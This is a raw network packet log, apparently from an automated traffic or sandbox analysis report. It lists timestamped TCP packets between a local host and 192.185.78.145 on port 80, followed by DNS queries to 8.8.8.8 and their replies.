                            Feb 23, 2021 08:49:50.122363091 CET4976180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.287271023 CET8049761192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.433459044 CET4976380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.595534086 CET8049763192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.596935034 CET4976380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.602565050 CET4976380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.764571905 CET8049763192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.764679909 CET4976380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.927418947 CET8049763192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.962508917 CET8049763192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.962865114 CET8049763192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:50.962941885 CET4976380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:50.963190079 CET4976380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.125164032 CET8049763192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:51.238353014 CET4976580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.399986982 CET8049765192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:51.400089979 CET4976580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.403125048 CET4976580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.564599037 CET8049765192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:51.564685106 CET4976580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.726104975 CET8049765192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:51.755176067 CET8049765192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:51.755266905 CET8049765192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:51.755342007 CET4976580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.755625010 CET4976580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:51.916966915 CET8049765192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.023401976 CET4976680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:52.185691118 CET8049766192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.186165094 CET4976680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:52.189174891 CET4976680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:52.351401091 CET8049766192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.352931023 CET4976680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:52.515095949 CET8049766192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.543189049 CET8049766192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.543420076 CET8049766192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.543488026 CET4976680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:52.543514013 CET4976680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:52.705638885 CET8049766192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:52.852449894 CET4976780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.014352083 CET8049767192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.014517069 CET4976780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.017834902 CET4976780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.179682970 CET8049767192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.179913998 CET4976780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.341727972 CET8049767192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.370479107 CET8049767192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.370742083 CET8049767192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.370848894 CET4976780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.370997906 CET4976780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.533149004 CET8049767192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.655667067 CET4976880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.817667961 CET8049768192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.817806005 CET4976880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.820832968 CET4976880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:53.982873917 CET8049768192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:53.983036995 CET4976880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.162533045 CET8049768192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.207701921 CET8049768192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.207802057 CET8049768192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.207916021 CET4976880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.207986116 CET4976880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.371289015 CET8049768192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.459835052 CET4976980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.624383926 CET8049769192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.624515057 CET4976980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.628473043 CET4976980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.790236950 CET8049769192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.790364027 CET4976980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.952073097 CET8049769192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.987622023 CET8049769192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.987891912 CET8049769192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:54.987988949 CET4976980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:54.988312960 CET4976980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.149944067 CET8049769192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:55.313766956 CET4977080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.475606918 CET8049770192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:55.475768089 CET4977080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.479697943 CET4977080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.641340017 CET8049770192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:55.641505003 CET4977080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.803174973 CET8049770192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:55.832416058 CET8049770192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:55.832468987 CET8049770192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:55.832577944 CET4977080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.832757950 CET4977080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:55.994450092 CET8049770192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.095894098 CET4977180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:56.257514000 CET8049771192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.257647991 CET4977180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:56.264238119 CET4977180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:56.427222013 CET8049771192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.427298069 CET4977180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:56.599914074 CET8049771192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.637950897 CET8049771192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.638139963 CET8049771192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.638215065 CET4977180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:56.638312101 CET4977180192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:56.801131964 CET8049771192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:56.924947023 CET4977280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.086966991 CET8049772192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.087080002 CET4977280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.090883970 CET4977280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.259934902 CET8049772192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.260030031 CET4977280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.425709963 CET8049772192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.455832958 CET8049772192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.455857992 CET8049772192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.456031084 CET4977280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.456902981 CET4977280192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.618737936 CET8049772192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.745271921 CET4977380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.906932116 CET8049773192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:57.907222986 CET4977380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:57.912353039 CET4977380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.074151993 CET8049773192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.074640036 CET4977380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.236355066 CET8049773192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.269815922 CET8049773192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.270103931 CET8049773192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.270256042 CET4977380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.270591974 CET4977380192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.432105064 CET8049773192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.530685902 CET4977480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.692161083 CET8049774192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.692342043 CET4977480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.700265884 CET4977480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:58.861819029 CET8049774192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:58.862180948 CET4977480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.023895979 CET8049774192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.063069105 CET8049774192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.063642979 CET4977480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.063667059 CET8049774192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.063779116 CET4977480192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.225239038 CET8049774192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.382441044 CET4977580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.544645071 CET8049775192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.544847012 CET4977580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.551681042 CET4977580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.713876963 CET8049775192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.713944912 CET4977580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.876152992 CET8049775192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.925751925 CET8049775192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.925965071 CET8049775192.185.78.145192.168.2.5
                            Feb 23, 2021 08:49:59.926095963 CET4977580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:49:59.926448107 CET4977580192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.088413954 CET8049775192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:00.208441973 CET4977680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.370918989 CET8049776192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:00.371124029 CET4977680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.379571915 CET4977680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.543025017 CET8049776192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:00.543251038 CET4977680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.705187082 CET8049776192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:00.736491919 CET8049776192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:00.736516953 CET8049776192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:00.736763954 CET4977680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.737185955 CET4977680192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:00.903532982 CET8049776192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:01.025523901 CET4977780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:01.188016891 CET8049777192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:01.191381931 CET4977780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:01.225791931 CET4977780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:01.388588905 CET8049777192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:01.389466047 CET4977780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:01.588058949 CET8049777192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:01.773279905 CET8049777192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:01.773500919 CET8049777192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:01.773622990 CET4977780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:01.773809910 CET4977780192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:01.937508106 CET8049777192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:02.309523106 CET4977880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:02.485352039 CET8049778192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:02.485574007 CET4977880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:02.942234039 CET4977880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:03.104382992 CET8049778192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:03.104578972 CET4977880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:03.266274929 CET8049778192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:03.318948984 CET8049778192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:03.319001913 CET8049778192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:03.319211006 CET4977880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:03.319669008 CET4977880192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:03.481350899 CET8049778192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:04.161376953 CET4977980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:04.323434114 CET8049779192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:04.323559999 CET4977980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:04.328154087 CET4977980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:04.497334003 CET8049779192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:04.497581959 CET4977980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:04.666779995 CET8049779192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:04.715640068 CET8049779192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:04.715692043 CET8049779192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:04.715909958 CET4977980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.235580921 CET4977980192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.400901079 CET8049779192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:05.456640005 CET4978080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.618887901 CET8049780192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:05.619021893 CET4978080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.623106956 CET4978080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.786514997 CET8049780192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:05.786597013 CET4978080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.949676037 CET8049780192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:05.984535933 CET8049780192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:05.984855890 CET8049780192.185.78.145192.168.2.5
                            Feb 23, 2021 08:50:05.984872103 CET4978080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:05.984911919 CET4978080192.168.2.5192.185.78.145
                            Feb 23, 2021 08:50:06.148664951 CET8049780192.185.78.145192.168.2.5

                            UDP Packets

                            Timestamp                             Source Port   Dest Port   Source IP         Dest IP
                            Feb 23, 2021 08:47:51.957576036 CET   52704         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:51.992965937 CET   52212         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:52.009357929 CET   53            52704       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:52.044507027 CET   53            52212       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:52.132742882 CET   54302         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:52.173027039 CET   53784         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:52.181622028 CET   53            54302       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:52.221787930 CET   53            53784       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:52.821727037 CET   65307         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:52.873526096 CET   53            65307       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:53.006393909 CET   64344         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:53.055088997 CET   53            64344       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:53.121504068 CET   62060         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:53.170142889 CET   53            62060       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:54.098929882 CET   61805         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:54.147650003 CET   53            61805       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:54.539326906 CET   54795         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:54.599116087 CET   53            54795       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:55.002402067 CET   49557         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:55.051300049 CET   53            49557       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:58.169590950 CET   61733         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:58.226943970 CET   53            61733       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:59.176139116 CET   65447         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:59.227647066 CET   53            65447       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:47:59.838608980 CET   52441         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:47:59.899094105 CET   53            52441       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:00.771543980 CET   62176         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:00.820616961 CET   53            62176       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:04.030673027 CET   59596         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:04.082407951 CET   53            59596       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:07.501413107 CET   65296         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:07.552992105 CET   53            65296       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:08.807288885 CET   63183         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:08.855995893 CET   53            63183       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:09.616969109 CET   60151         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:09.668607950 CET   53            60151       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:11.122785091 CET   56969         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:11.174304962 CET   53            56969       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:11.978822947 CET   55161         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:12.030325890 CET   53            55161       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:18.259526014 CET   54757         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:18.321134090 CET   53            54757       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:30.822457075 CET   49992         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:30.870986938 CET   53            49992       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:48.706115961 CET   60075         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:48.754849911 CET   53            60075       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:48:53.377608061 CET   55016         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:48:53.426345110 CET   53            55016       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:12.189282894 CET   64345         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:12.247212887 CET   53            64345       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:20.678886890 CET   57128         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:20.727756977 CET   53            57128       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:22.746526003 CET   54791         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:22.859203100 CET   53            54791       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:24.953957081 CET   50463         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:25.141832113 CET   53            50463       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:26.067426920 CET   50394         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:26.124541044 CET   53            50394       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:27.139729977 CET   58530         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:27.337553024 CET   53            58530       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:28.834021091 CET   53813         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:29.017906904 CET   53            53813       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:30.838077068 CET   63732         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:30.895327091 CET   53            63732       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:31.702461958 CET   57344         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:31.759629965 CET   53            57344       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:32.663688898 CET   54450         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:32.725080013 CET   53            54450       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:33.527338028 CET   59261         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:33.584520102 CET   53            59261       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:34.401932001 CET   57151         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:34.459041119 CET   53            57151       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:35.281724930 CET   59413         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:35.333215952 CET   53            59413       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:35.402014017 CET   60516         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:35.450622082 CET   53            60516       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:36.152736902 CET   51649         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:36.212917089 CET   53            51649       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:39.014914989 CET   65086         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:39.066433907 CET   53            65086       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:39.839940071 CET   56432         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:39.900213003 CET   53            56432       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:40.670694113 CET   52929         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:40.853167057 CET   53            52929       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:41.616817951 CET   64317         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:41.674030066 CET   53            64317       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:42.491641045 CET   61004         53          192.168.2.5       8.8.8.8
                            Feb 23, 2021 08:49:42.540183067 CET   53            61004       8.8.8.8           192.168.2.5
                            Feb 23, 2021 08:49:43.315052032 CET5689553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:43.366683006 CET53568958.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:44.121681929 CET6237253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:44.181931973 CET53623728.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:45.044739008 CET6151553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:45.108205080 CET53615158.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:46.037842035 CET5667553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:46.097811937 CET53566758.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:46.885462999 CET5717253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:46.942615032 CET53571728.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:47.076524019 CET5526753192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:47.133769035 CET53552678.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:47.750703096 CET5096953192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:47.783256054 CET6436253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:47.807673931 CET53509698.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:47.842114925 CET53643628.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.049995899 CET5476653192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.114898920 CET53547668.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.269165039 CET6144653192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.330771923 CET53614468.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.638226032 CET5751553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.686953068 CET53575158.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:48.914002895 CET5819953192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:48.973217964 CET53581998.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:49.469754934 CET6522153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:49.529510021 CET53652218.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:49.765470982 CET6157353192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:49.822539091 CET53615738.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:50.380815983 CET5656253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:50.429570913 CET53565628.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:50.666286945 CET5359153192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:50.728369951 CET53535918.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:51.176249027 CET5968853192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:51.234113932 CET53596888.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:51.972486973 CET5603253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:52.021190882 CET53560328.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:52.794002056 CET6115053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:52.850966930 CET53611508.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:53.589860916 CET6345853192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:53.648022890 CET53634588.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:54.398741961 CET5042253192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:54.453586102 CET53504228.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:55.252079010 CET5324753192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:55.309329987 CET53532478.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:56.039648056 CET5854453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:56.093118906 CET53585448.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:56.871685028 CET5381453192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:56.923170090 CET53538148.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:57.685812950 CET5130553192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:57.742845058 CET53513058.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:58.478722095 CET5367053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:58.527405977 CET53536708.8.8.8192.168.2.5
                            Feb 23, 2021 08:49:59.317658901 CET5516053192.168.2.58.8.8.8
                            Feb 23, 2021 08:49:59.380300045 CET53551608.8.8.8192.168.2.5
                            Feb 23, 2021 08:50:00.153100967 CET6141453192.168.2.58.8.8.8
